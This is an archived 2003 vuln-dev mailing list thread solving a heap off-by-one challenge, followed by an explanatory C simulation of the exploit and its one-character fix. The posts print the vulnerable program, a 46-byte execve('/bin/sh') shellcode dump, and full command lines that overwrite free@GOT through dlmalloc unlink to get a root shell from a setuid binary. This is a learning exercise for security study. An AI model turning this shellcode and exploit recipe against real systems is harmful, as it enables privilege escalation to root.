Vulnerability Development mailing list archives
RE: vulndev1.c solution (warning SPOILER)
From: "Cameron Brown" <cameron () greyzone com>
Date: Wed, 14 May 2003 02:43:29 -0700
This *almost* worked for me, but not quite. After figuring out the correct addresses to substitute, I was still getting segfaults. After some playing I tried the following, which worked for me:

    ./vuln1 `printf "\xeb\x0c"``perl -e 'print "A"x204;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08\x39\xf8\xff\xbf"`

Adding the "\xeb\x0c" jumps over the damage done by free() at p1+8. I'm not sure I understand yet how it could have worked for you without the jump. My free() damage was a call into bad memory, maybe yours was somehow something less disruptive?

Thanks very much, Jose, for posting this spoiler, and thanks Dave McKinney and Aaron Adams for posing this challenge to the list. As a newcomer I have learned more in one day today about exploits than I have in the past 2 months of watching this list.

Cameron

-----Original Message-----
From: Jose Ronnick [mailto:matrix () phiral com]
Sent: Tuesday, May 13, 2003 6:23 PM
To: vuln-dev () securityfocus com
Subject: Re: vulndev1.c solution (warning SPOILER)

Man.. someone's gotta show you guys how it's done... If you want to solve it yourself, don't read any further..

matrix@overdose vuln-dev $ cat vulndev1.c
// vulndev-1.c
// vuln-dev mailing list security challenge #1
// by Aaron Adams <aadams () securityfocus com>
// Spot the error in this program.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strncpy */

#define SIZE 252

int main(int argc, char *argv[])
{
        int i;
        char *p1, *p2;
        char *buf1 = malloc(SIZE);
        char *buf2 = malloc(SIZE);

        if (argc != 3)
                exit(1);

        p1 = argv[1], p2 = argv[2];
        printf("p1 is at %p\n", p1); // DEBUG
        strncpy(buf2, p2, SIZE);

        for (i = 0; i <= SIZE && p1[i] != '\0'; i++)
                buf1[i] = p1[i];

        free(buf1);
        free(buf2);
        return 0;
}
matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c
matrix@overdose vuln-dev $ sudo chown root.root ./vuln1
matrix@overdose vuln-dev $ sudo chmod u+s ./vuln1
matrix@overdose vuln-dev $ objdump -R ./vuln1

./vuln1:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049654 R_386_GLOB_DAT    __gmon_start__
0804963c R_386_JUMP_SLOT   malloc
08049640 R_386_JUMP_SLOT   __libc_start_main
08049644 R_386_JUMP_SLOT   printf
08049648 R_386_JUMP_SLOT   exit
0804964c R_386_JUMP_SLOT   free
08049650 R_386_JUMP_SLOT   strncpy

matrix@overdose vuln-dev $ pcalc 0x4c-12
        64              0x40            0y1000000
matrix@overdose vuln-dev $ od -ch shell
0000000   1 300 260   F   1 333   1 311 315 200 353 026   [   1 300 210
           c031    46b0    db31    c931    80cd    16eb    315b    88c0
0000020   C  \a 211   [  \b 211   C  \f 260  \v 215   K  \b 215   S  \f
           0743    5b89    8908    0c43    0bb0    4b8d    8d08    0c53
0000040 315 200 350 345 377 377 377   /   b   i   n   /   s   h
           80cd    e5e8    ffff    2fff    6962    2f6e    6873
0000056
matrix@overdose vuln-dev $ wc -c shell
     46 shell
matrix@overdose vuln-dev $ pcalc 252-46
        206             0xce            0y11001110
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08ABCD"`
p1 is at 0xbffff839
Segmentation fault
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08\x39\xf8\xff\xbf"`
p1 is at 0xbffff839
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio)
sh-2.05b#

questions? comments?
>=) -- %JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXq v-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-<C19-~mvIP-PqcJ- yaa7P-c0oe-rAypP-I$*F-q)cjP-*22a-WPjDP-5134-tPUn-w4wxP-118B-WV4w-xx4vPPP PPPPPPPPPPPPPPPPPPP
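The mechanics both messages rely on, as an added example that is not part of either post and is not Aaron's, Jose's or Cameron's code. It keeps the challenge's copy loop next to the one-character fix, then models on a tiny 32-bit little-endian address space what the exploit above does to the heap: malloc(252) twice gives two 0x100-byte chunks, so buf1[252] is the low byte of the second chunk's size field; the out-of-bounds 0x0b makes free(buf1) believe the chunk after buf2's is free and run the unchecked dlmalloc unlink() of the glibc of the day, with fd and bk taken straight from argv[2]. free@GOT (0x0804964c) and p1 (0xbffff839) are the addresses printed on the page; the heap base, the top-chunk size and the value free@GOT held beforehand are assumptions and are marked as such in the code. Only the forward-consolidation step of free() is modelled, nothing is executed, and the shellcode bytes are the od dump transcribed as data.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define SIZE 252

/* The challenge's loop, unchanged: i reaches SIZE, so 253 non-NUL source bytes write 253. */
static size_t copy_vuln(char *dst, const char *src) {
    int i;
    for (i = 0; i <= SIZE && src[i] != '\0'; i++) dst[i] = src[i];
    return (size_t)i;   /* bytes written */
}
/* The one-character fix: dst[SIZE] is never written. */
static size_t copy_fixed(char *dst, const char *src) {
    int i;
    for (i = 0; i < SIZE && src[i] != '\0'; i++) dst[i] = src[i];
    return (size_t)i;
}

/* Model of the target's address space (32-bit, little-endian); GOT and stack addresses
 * are the post's own, the heap base and the original free@GOT value are assumed. */
#define GOT_BASE   0x08049600u
#define HEAP_BASE  0x08049a00u   /* assumed; the post never prints it */
#define STACK_BASE 0xbffff800u
#define GOT_FREE   0x0804964cu   /* R_386_JUMP_SLOT free, from objdump -R */
#define P1         0xbffff839u   /* "p1 is at 0xbffff839" */
#define FREE_PLT   0x080483a6u   /* assumed: what free@GOT held before the attack */
static uint8_t got[0x100], heap[0x300], stack[0x200];

static uint8_t *vaddr(uint32_t a) {
    if (a - GOT_BASE   < sizeof got)   return got   + (a - GOT_BASE);
    if (a - HEAP_BASE  < sizeof heap)  return heap  + (a - HEAP_BASE);
    if (a - STACK_BASE < sizeof stack) return stack + (a - STACK_BASE);
    return NULL;   /* not reached: every access made below is mapped */
}
static uint32_t rd32(uint32_t a) {
    const uint8_t *p = vaddr(a);
    return !p ? 0 : (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr32(uint32_t a, uint32_t v) {
    uint8_t *p = vaddr(a);
    if (p) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24); }
}

/* dlmalloc unlink() as glibc shipped it in 2003, before the FD->bk == P sanity checks.
 * fd/bk sit at P+8/P+12, so FD->bk is FD+12: that is the post's "0x4c-12". With
 * fd = free@GOT - 12 the first store is *(free@GOT) = bk; the second lands at bk+8 = p1+8. */
static void unlink_chunk(uint32_t P) {
    uint32_t FD = rd32(P + 8), BK = rd32(P + 12);
    wr32(FD + 12, BK);   /* FD->bk = BK */
    wr32(BK + 8, FD);    /* BK->fd = FD */
}
/* Forward-consolidation step of free(p) only: the chunk after p counts as free when the
 * PREV_INUSE bit of the chunk after *it* is clear. Returns 1 if it unlinked. */
static int free_forward_merge(uint32_t p) {
    uint32_t size = rd32(p + 4) & ~7u, next = p + size, nextsize = rd32(next + 4) & ~7u;
    if (rd32(next + nextsize + 4) & 1) return 0;
    unlink_chunk(next);
    return 1;
}

static const uint8_t shell[46] = {   /* the 46 bytes of "shell", from the od -ch dump above */
    0x31,0xc0,0xb0,0x46,0x31,0xdb,0x31,0xc9,0xcd,0x80,0xeb,0x16,0x5b,0x31,0xc0,0x88,
    0x43,0x07,0x89,0x5b,0x08,0x89,0x43,0x0c,0xb0,0x0b,0x8d,0x4b,0x08,0x8d,0x53,0x0c,
    0xcd,0x80,0xe8,0xe5,0xff,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68 };
/* argv[1] as Cameron builds it: "\xeb\x0c" + 204*'A' + shell + "\x0b" = 253 bytes. */
static size_t build_argv1(uint8_t *out) {
    size_t n = 0;
    out[n++] = 0xeb; out[n++] = 0x0c;
    memset(out + n, 'A', 204); n += 204;
    memcpy(out + n, shell, sizeof shell); n += sizeof shell;
    out[n++] = 0x0b;   /* the byte the loop writes out of bounds */
    return n;
}

/* Heap as malloc(252); malloc(252) lays it out (two 0x100-byte chunks, then top), argv[2]
 * in buf2, argv[1] copied into buf1 by the chosen loop, then the free(buf1) step.
 * Returns the bytes copied; whether chunk 2 was unlinked shows in free@GOT afterwards. */
static size_t simulate(int use_fixed) {
    char *buf1 = (char *)vaddr(HEAP_BASE + 8), *p1 = (char *)vaddr(P1);
    size_t n;
    memset(got, 0, sizeof got); memset(heap, 0, sizeof heap); memset(stack, 0, sizeof stack);
    wr32(GOT_FREE, FREE_PLT);
    wr32(HEAP_BASE + 0x004, 0x101);         /* chunk 1: size 0x100 | PREV_INUSE */
    wr32(HEAP_BASE + 0x104, 0x101);         /* chunk 2: buf1[252] is this field's low byte */
    wr32(HEAP_BASE + 0x204, 0xe01);         /* top chunk: assumed size | PREV_INUSE */
    wr32(HEAP_BASE + 0x108, GOT_FREE - 12); /* buf2 = argv[2]: fd = 0x08049640 ... */
    wr32(HEAP_BASE + 0x10c, P1);            /* ... bk = 0xbffff839; strncpy NUL-pads the rest */
    build_argv1((uint8_t *)p1);
    n = use_fixed ? copy_fixed(buf1, p1) : copy_vuln(buf1, p1);
    free_forward_merge(HEAP_BASE);
    return n;
}
/* Decode the short jump at `at` (EB rel8): target = at + 2 + rel8. */
static uint32_t jmp_short_target(uint32_t at) {
    const uint8_t *p = vaddr(at);
    return (p && p[0] == 0xeb) ? at + 2 + (uint32_t)(int8_t)p[1] : at;
}

int main(void) {
    size_t n = simulate(1);
    printf("fixed loop: %zu bytes, free@GOT=0x%08x\n", n, (unsigned)rd32(GOT_FREE));
    n = simulate(0);
    printf("vuln loop: %zu bytes, chunk2 size=0x%x, free@GOT=0x%08x, *(p1+8)=0x%08x, jmp->p1+%u\n", n,
           (unsigned)rd32(HEAP_BASE + 0x104), (unsigned)rd32(GOT_FREE), (unsigned)rd32(P1 + 8), (unsigned)(jmp_short_target(P1) - P1));
    return 0;
}
```

Compile with `gcc -std=c99 -Wall` and run. The vulnerable loop reports 253 bytes, chunk 2's size field reads 0x10b, free@GOT ends up holding p1, and the dword at p1+8 holds 0x08049640: that is the collateral BK->fd store Cameron's "\xeb\x0c" skips, since a jmp short 0x0c at p1 continues at p1+14, past the clobbered bytes at p1+8..p1+11. The same run with the fixed loop writes 252 bytes, chunk 2's size field stays 0x101 and free@GOT is untouched.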